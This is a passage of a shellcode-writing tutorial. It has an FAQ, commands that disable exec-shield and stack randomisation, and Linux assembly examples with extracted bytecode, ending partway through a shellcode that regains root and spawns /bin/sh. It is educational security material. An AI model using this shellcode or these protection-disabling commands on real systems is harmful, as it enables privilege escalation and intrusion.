Shellcode Tutorial.doc

Shellcoding for Linux and Windows Tutorial with example windows and linux shellcode by steve hanna steve./c/.hanna@gmail/.com for premier computer security research check out: http://www.sigmil.org/ Table of Contents Change Log 2 Frequently Asked Questions 2 1. What is shellcoding? 2 2. There are tons of shellcode repositories all around the internet, why should I write my own? 2 3. What do I need to know before I begin? 2 4. What are the differences between windows shellcode and Linux shellcode? 3 5. So, what about windows? How do I find the addresses of my needed DLL functions? Don't these addresses change with every service pack upgrade? 3 6. What's the hype with making sure the shellcode won't have any NULL bytes in it? Normal programs have lots of NULL bytes! 3 7. Why does my shellcode program crash when I run it? 4 8. Can I contact you? 4 9. Why did you use intel syntax, UGHHH?! 4 10. Why does my program keep segfaulting? Yes, I read item 7 above, but it STILL crashes. 4 Required Tools 5 Optional Tools 5 Linux Shellcoding 6 Example 1 - Making a Quick Exit 6 Example 2 - Saying Hello 7 Example 3 - Spawning a Shell 9 Windows Shellcoding 11 Example 1 - Sleep is for the Weak! 11 Example 2 - A Message to say "Hey" 12 Example 3 - Adding an Administrative Account 17 Advanced Shellcoding 20 Further Reading 23 Conclusion 23 Change Log 1. Created - July 2004 2. Advanced Shellcoding Methods Section Added - Sept 2005 3. Updated Faq regarding stack randomization. - June 2007 Frequently Asked Questions 1. What is shellcoding? In computer security, shellcoding in its most literal sense, means writing code that will return a remote shell when executed. The meaning of shellcode has evolved, it now represents any byte code that will be inserted into an exploit to accomplish a desired task. 2. There are tons of shellcode repositories all around the internet, why should I write my own? Yes, you are correct, there are tons of repositories all around the internet for shellcoding. Namely, the metasploit project seems to be the best. Writing an exploit can be difficult, what happens when all of the prewritten blocks of code cease to work? You need to write your own! Hopefully this tutorial will give you a good head start. 3. What do I need to know before I begin? A decent understanding of x86 assembly, C, and knowledge of the Linux and Windows operating systems. 4. What are the differences between windows shellcode and Linux shellcode? Linux, unlike windows, provides a direct way to interface with the kernel through the int 0x80 interface. A complete listing of the Linux syscall table can be found here. Windows on the other hand, does not have a direct kernel interface. The system must be interfaced by loading the address of the function that needs to be executed from a DLL (Dynamic Link Library). The key difference between the two is the fact that the address of the functions found in windows will vary from OS version to OS version while the int 0x80 syscall numbers will remain constant. Windows programmers did this so that they could make any change needed to the kernel without any hassle; Linux on the contrary has fixed numbering system for all kernel level functions, and if they were to change, there would be a million angry programmers (and a lot of broken code). 5. So, what about windows? How do I find the addresses of my needed DLL functions? Don't these addresses change with every service pack upgrade? There are multitudes of ways to find the addresses of the functions that you need to use in your shellcode. There are two methods for addressing functions; you can find the desired function at runtime or use hard coded addresses. This tutorial will mostly discuss the hard coded method. The only DLL that is guaranteed to be mapped into the shellcode's address space is kernel32.dll. This DLL will hold LoadLibrary and GetProcAddress, the two functions needed to obtain any functions address that can be mapped into the exploits process space. There is a problem with this method though, the address offsets will change with every new release of Windows (service packs, patches etc.). So, if you use this method your shellcode will ONLY work for a specific version of Windows. Further dynamic addressing will be referenced at the end of the paper in the Further Reading section. 6. What's the hype with making sure the shellcode won't have any NULL bytes in it? Normal programs have lots of NULL bytes! Well this isn't a normal program! The main problem arises in the fact that when the exploit is inserted it will be a string. As we all know, strings are terminated with a NULL byte (C style strings anyhow). If we have a NULL byte in our shellcode things won't work correctly. 7. Why does my shellcode program crash when I run it? Well, in most shellcode the assembly contained within has some sort of self modifying qualities. Since we are working in protected mode operating systems the .code segment of the executable image is read only. That is why the shell program needs to copy itself to the stack before attempting execution. 8. Can I contact you? Sure, just email shanna@uiuc.edu. Feel free to ask questions, comments, or correct something that is wrong in this tutorial. 9. Why did you use intel syntax, UGHHH?! I don't know! I honestly prefer at&t syntax, but for some reason I felt compelled to do this in intel syntax. I am really sorry! 10. Why does my program keep segfaulting? Yes, I read item 7 above, but it STILL crashes. You probably are using an operating system with randomized stack and address space and possibly a protection mechanism that prevents you from executing code on the stack. All Linux based operating systems are not the same, so I present a solution for Fedora that should adapt easily. echo 0 > /proc/sys/kernel/exec-shield #turn it off echo 0 > /proc/sys/kernel/randomize_va_space #turn it off echo 1 > /proc/sys/kernel/exec-shield #turn it on echo 1 > /proc/sys/kernel/randomize_va_space #turn it on Background Information EAX, EBX, ECX, and EDX are all 32-bit General Purpose Registers on the x86 platform. AH, BH, CH and DH access the upper 16-bits of the GPRs. AL, BL, CL, and DL access the lower 8-bits of the GPRs. ESI and EDI are used when making Linux syscalls. Syscalls with 6 arguments or less are passed via the GPRs. XOR EAX, EAX is a great way to zero out a register (while staying away from the nefarious NULL byte!) In Windows, all function arguments are passed on the stack according to their calling convention. Required Tools gcc ld nasm objdump Optional Tools odfhex.c - a utility created by me to extract the shellcode from "objdump -d" and turn it into escaped hex code (very useful!). arwin.c - a utility created by me to find the absolute addresses of windows functions within a specified DLL. shellcodetest.c - this is just a copy of the c code found below. it is a small skeleton program to test shellcode. exit.asm hello.asm msgbox.asm shellex.asm sleep.asm adduser.asm - the source code found in this document (the win32 shellcode was written with Windows XP SP1). Linux Shellcoding When testing shellcode, it is nice to just plop it into a program and let it run. The C program below will be used to test all of our code. /*shellcodetest.c*/ char code[] = "bytecode will go here!"; int main(int argc, char **argv) { int (*func)(); func = (int (*)()) code; (int)(*func)(); } Example 1 - Making a Quick Exit The easiest way to begin would be to demonstrate the exit syscall due to it's simplicity. Here is some simple asm code to call exit. Notice the al and XOR trick to ensure that no NULL bytes will get into our code. ;exit.asm [SECTION .text] global _start _start: xor eax, eax ;exit is syscall 1 mov al, 1 ;exit is syscall 1 xor ebx,ebx ;zero out ebx int 0x80 Take the following steps to compile and extract the byte code. steve hanna@1337b0x:~$ nasm -f elf exit.asm steve hanna@1337b0x:~$ ld -o exiter exit.o steve hanna@1337b0x:~$ objdump -d exiter exiter: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: b0 01 mov $0x1,%al 8048082: 31 db xor %ebx,%ebx 8048084: cd 80 int $0x80 The bytes we need are b0 01 31 db cd 80. Replace the code at the top with: char code[] = "\xb0\x01\x31\xdb\xcd\x80"; Now, run the program. We have a successful piece of shellcode! One can strace the program to ensure that it is calling exit. Example 2 - Saying Hello For this next piece, let's ease our way into something useful. In this block of code one will find an example on how to load the address of a string in a piece of our code at runtime. This is important because while running shellcode in an unknown environment, the address of the string will be unknown because the program is not running in its normal address space. ;hello.asm [SECTION .text] global _start _start: jmp short ender starter: xor eax, eax ;clean up the registers xor ebx, ebx xor edx, edx xor ecx, ecx mov al, 4 ;syscall write mov bl, 1 ;stdout is 1 pop ecx ;get the address of the string from the stack mov dl, 5 ;length of the string int 0x80 xor eax, eax mov al, 1 ;exit the shellcode xor ebx,ebx int 0x80 ender: call starter ;put the address of the string on the stack db 'hello' steve hanna@1337b0x:~$ nasm -f elf hello.asm steve hanna@1337b0x:~$ ld -o hello hello.o steve hanna@1337b0x:~$ objdump -d hello hello: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: eb 19 jmp 804809b 08048082 <starter>: 8048082: 31 c0 xor %eax,%eax 8048084: 31 db xor %ebx,%ebx 8048086: 31 d2 xor %edx,%edx 8048088: 31 c9 xor %ecx,%ecx 804808a: b0 04 mov $0x4,%al 804808c: b3 01 mov $0x1,%bl 804808e: 59 pop %ecx 804808f: b2 05 mov $0x5,%dl 8048091: cd 80 int $0x80 8048093: 31 c0 xor %eax,%eax 8048095: b0 01 mov $0x1,%al 8048097: 31 db xor %ebx,%ebx 8048099: cd 80 int $0x80 0804809b <ender>: 804809b: e8 e2 ff ff ff call 8048082 80480a0: 68 65 6c 6c 6f push $0x6f6c6c65 Replace the code at the top with: char code[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd"\ "\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f"; At this point we have a fully functional piece of shellcode that outputs to stdout. Now that dynamic string addressing has been demonstrated as well as the ability to zero out registers, we can move on to a piece of code that gets us a shell. Example 3 - Spawning a Shell This code combines what we have been doing so far. This code attempts to set root privileges if they are dropped and then spawns a shell. Note: system("/bin/sh") would have been a lot simpler right? Well the only problem with that approach is the fact that system always drops privileges. Remember when reading this code: execve (const char *filename, const char** argv, const char** envp); So, the second two argument expect pointers to pointers. That's why I load the address of the "/bin/sh" into the string memory and then pass the address of the string memory to the function. When the pointers are dereferenced the target memory will be the "/bin/sh" string. ;shellex.asm [SECTION .text] global _start _start: xor eax, eax mov al, 70 ;setreuid is syscall 70 xor ebx, ebx xor ecx, ecx int 0x80 jmp short ender starter: pop ebx ;get the address of the string xor eax, eax mov [ebx+7 ], al ;put a NULL where the N is in the string mov [ebx+8 ], ebx ;put the address of the string to where the ;AAAA is mov [ebx+12], eax ;put 4 null bytes into where the BBBB is mov al, 11 ;execve is syscall 11 lea ecx, [ebx+8] ;load the address of where the AAAA was lea edx, [ebx+12] ;load the address of the NULLS int 0x80 ;call the kernel, WE HAVE A SHELL! ender: call starter db '/bin/shNAAAABBBB' steve hanna@1337b0x:~$ nasm -f elf shellex.asm steve hanna@1337b0x:~$ ld -o shellex shellex.o steve hanna@1337b0x:~$ objdump -d shellex shellex: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: 31 c0 xor %eax,%eax 8048082: b0 46 mov $0x46,%al 8048084: 31 db xor %ebx,%ebx 8048086: 31 c9 xor %ecx,%ecx 8048088: cd 80 int $0x80 804808a: eb 16 jmp 80480a2 0804808c : 804808c: 5b pop %ebx 804808d: 31 c0 xor %eax,%eax 804808f: 88 43 07 mov %al,0x7(%ebx) 8048092: 89 5b 08 mov %ebx,0x8(%ebx) 8048095: 89 43 0c mov %eax,0xc(%ebx) 8048098: b0 0b mov $0xb,%al 804809a: 8d 4b 08 lea 0x8(%ebx),%ecx 804809d: 8d 53 0c lea 0xc(%ebx),%edx 80480a0: cd 80 int $0x80 080480a2 : 80480a2: e8 e5 ff ff ff call 804808c 80480a7: 2f das 80480a8: 62 69 6e bound %ebp,0x6e(%ecx) 80480ab: 2f das 80480ac: 73 68 jae 8048116 80480ae: 58 pop %eax 80480af: 41 inc %ecx 80480b0: 41 inc %ecx 80480b1: 41 inc %ecx 80480b2: 41 inc %ecx 80480b3: 42 inc %edx 80480b4: 42 inc %edx 80480b5: 42